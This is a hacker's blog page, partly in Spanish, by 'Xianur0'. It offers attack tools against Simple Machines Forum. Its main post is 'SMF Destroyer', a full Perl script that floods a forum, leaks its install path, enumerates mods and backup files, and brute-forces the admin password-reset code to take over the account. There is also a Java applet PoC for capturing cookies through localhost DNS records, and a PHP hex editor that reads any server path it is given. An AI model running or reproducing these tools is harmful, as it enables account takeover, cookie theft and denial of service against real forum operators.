SMF all Versions XSRF/XSS/Package Upload Vulnerability
Posted on 22:40 by Xianur0
Author: Xianur0
Vulnerable Version: All
http://securityreason.com/exploitalert/5590
-
[PoC] Problems Invalids DNS Records
Posted on 14:06 by Xianur0
A classic error is that the DNS records are created by default "A" record that points to localhost 127.0.0.1, for example:
localhost.php.net = 127.0.0.1
If we make an HTTP GET query subdomain that the result is redirected to our own computer on port 80, so we can create an exploit that capture the data coming into this port (including cookies)
PoC Applet:
Código:
/*
* PoC Problems Invalids DNS Records.
* Author: Xianur0
* Credits:
* Pandora's Box Team: http://e-r00t.s0me.co.cc
* Infierno Hacker: http://www.infiernohacker.com/
*/
import java.applet.Applet;
import java.io.*;
import java.net.*;
//By Xianur0
//uxmal666@gmail.com
public class PoC extends Applet {
public static void main(String args[])
{
// Message terminator
char EOF = (char)0x00;
try
{
ServerSocket s = new ServerSocket(80);
System.out.println("Server started. Waiting for connections...");
// wait for incoming connections
Socket incoming = s.accept();
BufferedReader data_in = new BufferedReader(new InputStreamReader(incoming.getInputStream()));
PrintWriter data_out = new PrintWriter(incoming.getOutputStream());
// HTTP Response (Fake)
data_out.println("OK - 200\nCache-Control: private, max-age=0\nDate=Sat, 17 Jan 2009 18:15:23 GMT\nExpires: -1\nServer: Xianur0Exploit\nContent-Type=text/html; charset=UTF-8\n\nXianur0 Was Here!\n\n" + EOF);
data_out.flush();
boolean quit = false;
while (!quit)
{
String msg = data_in.readLine();
if (msg == null) quit = true;
System.out.println("HTTP Header: "+msg.trim()+EOF);
data_out.flush();
}
}
catch (Exception e)
{
System.out.println("Can not create socket!");
}
}
}
only need to call the applet which created a socket to listen on port 80 and print data arriving
...Nota: A los que decían que era imposible este bug simplemente les dire me salio el applet!! xDDDDDD
para que entiendan mas el como funciona:
http://xianur0.blogspot.com/2008/08/xss-otro-nivel.html
aunque supongo que ya es un tema muy simple de entender xDDD
SMF Destroyer 0.1 By Xianur0 [Priv8 Liberado]
Posted on 20:39 by Xianur0
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Std;
use LWP::Simple;
use HTTP::Request;
#By Xianur0
#Uxmal666@gmail.com
print "\n\n\x09\x09\x09\x09\x09SMF Destroyer 0.1 By Xianur0 [Priv8]\n\n";
my $url = $ARGV[1] || die ("Use: smf.pl [option] [Full URL] [Proxy:Puerto]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l Installed Mods List \n-b Find Temporary\n-c Link crack Activation (Recommended Use Proxy)");
version();
my $proxy = $ARGV[2] || "";
if($ARGV[0] ne "-c" && $proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}
getopts('fplbc', \%opt);
crackeador() if $opt{c};
flood() if $opt{f};
path() if $opt{p};
list() if $opt{l};
temp() if $opt{b};
sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}
sub version {
$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
$req = HTTP::Request->new(GET => $url);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /title="Simple Machines Forum" target="_blank">Powered by SMF (.*?)<\/a>/){
$version = $1;
print "\n[X] SMF Version: $version\n";
if($version < "1.1.7") {
print "\n[X] Outdated Version $version!!!!!!!!!!!\n\n[X] http://milw0rm.com/search.php?dong=smf".$version."\n\n";
}
}}}
sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /Undefined variable: ssi_layers in <b>(.*?)SSI.php/){
print "[X] Directory: $1\n";
} else { print "[!] Getting error Directory!\n";}
}
}
sub flood {
print "[X] Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET => $url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "[-] Sent: ".$i."\n";
} else {
print "[!] HTTP Error Query: " . $res->status_line . "\n";
}
}
}
sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "[X] Temporary File Found: ".$url."/".$temp."\n";
} else {print "[!] Not Found: ".$url."/".$temp."\n";}
}
}
sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "[X]Package:\nDescription: $mod[0]\nFile: $url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";
}
}
}
sub crackeador() {
$url = $ARGV[0];
$nick = $ARGV[1];
$id = $ARGV[2] || die("Use: smf.pl -c [URL SMF] [Nick Admin] [ID Admin] [Proxy:Puerto]\nExample: smf.pl -c http://www.simplemachines.org/community/ dschwab9 179 www.carlosslim.com:3128\n");
my $reminder = $url."?action=reminder";
my $smf = $reminder.";sa=setpassword;u=".$id.";code=";
my $proxy = $ARGV[3];
if($proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}
sub mail() {
my $content = HTTP::Request->new(GET => $reminder);
$contenedor = $ua->request($content)->as_string;
if ($contenedor =~ /Set-Cookie: (.*?)
/){
print "\n[+] SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
if ($contenedor =~ /<input type="hidden" name="sc" value="(.*?)"/){
print "\n[+] sc Detected: $1\n";
$sc = $1;
} else { die "[!] SC could not be found!\n";}
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('user='.$nick.'&sc='.$sc.'&=enviar');
$req->header('Cookie' => $session);
my $res = $ua->request($req)->as_string;
if(!$res) {exit;}
print "[x]Sent!\n";
}
sub generador() {
my $password = "";
my $checksum = "";
my @chars = split(" ","0 1 2 3 4 5 6 7 8 9 a b c d e f");
for (my $i=0; $i < 10 ;$i++) {
$_rand = int(rand 16);
$password .= $chars[$_rand];
}
return $password;
}
sub brute() {
while($bucle ne "finito") {
$code = generador();
my $fuente = $reminder.";sa=setpassword;u=".$id.";code=".$code;
my $content = HTTP::Request->new(GET => $reminder);
my $content = $ua->request($content)->as_string;
if ($content =~ /<input type="hidden" name="sc" value="(.*?)"/){
$sc = $1;
} else { die "[!] SC could not be found!\n";}
if ($content =~ /Set-Cookie: (.*?)
/){
print "\n[+] New SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
print "[+] Testing Code: ".$code."\n";
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('passwrd1=xianur0washere&passwrd2=xianur0washere&code='.$code.'&u='.$id.'&sc='.$sc);
$req->header('Cookie' => $session);
$res = $ua->request($req);
if ($res->is_success) {
if($res->content =~ '<input type="text" name="user" size="20" value="') {
print "[-] Password Changed!\n[x] New password: xianur0washere\nUsername: $1\n";
exit;
}
} else { die "[!] HTTP response incorrect!\n";}}}
print "\n[-] Sending Mail...\n\n";
mail();
print "\n[-] Attacking code link recovery...\n";
brute();
}
Nota: Gracias Gente por hacerme notar que los códigos de los links tienen checksum :)..
la funcion del crackeador es la que esta activa en todos los SMF, es decir, no hay un sistema anti-flood/que filtre el probar códigos para resolver el link de recuperación, es decir envio el mail de recuperación a la cuenta del admin, y se le envia un link con un código de 10 caracteres que solo cubren letras y numeros, y además no hay un sistema que detecte cuando se esta usando un bot para probar los códigos del link (es decir se genera aleatorio 10 caracteres y se prueba intentar cambiar la password y si el admin no ve el correo en su bandeja, en un rato la tool lograra descubrir el código del link de recuperación y cambiar la password, por ende en un rato con esa tool ya tienes la cuenta del admin :)...)
todo esto automatizado (desde el envio del mail hasta el cambiar la password y generar el código).
Simple no?
Editor Hexadecimal PHP By Xianur0
Posted on 13:23 by Xianur0
<?php
function html() {
print '<html>
<head><title>Editor Hexadecimal PHP By Xianur0</title></head>
<body>
<h1>Editor Hexadecimal PHP By Xianur0</h1>
<form method="post">
Path Archivo: <input name="archivo" type="text">
<br><input type="submit" value="Hex!">
</form>';
}
function descargar($descargar){
header("Content-type: application/octet-stream");
header("Content-Disposition: attachment; filename=cambiarnombre\n");
print $descargar;
}
if(isset($_POST['archivo'])) {
define("path",$_POST['archivo']);
function detectar($byte) {
$linea = 1;
print "<form method='post'><textarea name='modificado' rows='20' cols='40'>";
for ($i = 0; $i < strlen($byte); $i++) {
if(is_int($i/8)) {$linea++; $caracter = "\n".$linea.". ";} else $caracter = " ";
$ordenados .= $byte{$i}.$caracter;
$ordenadosh .= ord($byte{$i}).$caracter;
}
print "1. ";
print $ordenadosh;
print "</textarea><textarea readonly='true' rows='20' cols='40'>";
print "1. ";
print $ordenados."</textarea><br><br><input type='submit' value='Guardar!'></form>";
}
$handle = @fopen(path, "rb");
$codigo = @fread($handle, filesize(path));
@fclose($handle);
detectar($codigo);
}
if(isset($_POST['modificado'])) {
function guardar($modificado) {
$lineas = explode("\n", $modificado);
foreach($lineas as $valor) {
$valores = explode(".", $valor);
$cadena .= $valores[1];
}
$caracter = explode(" ", $cadena);
foreach($caracter as $valor) {
$legible .= chr($valor);
}
descargar($legible);
}
guardar($_POST['modificado']);
exit;
}
html();
?>
Suscribirse a:
Entradas (Atom)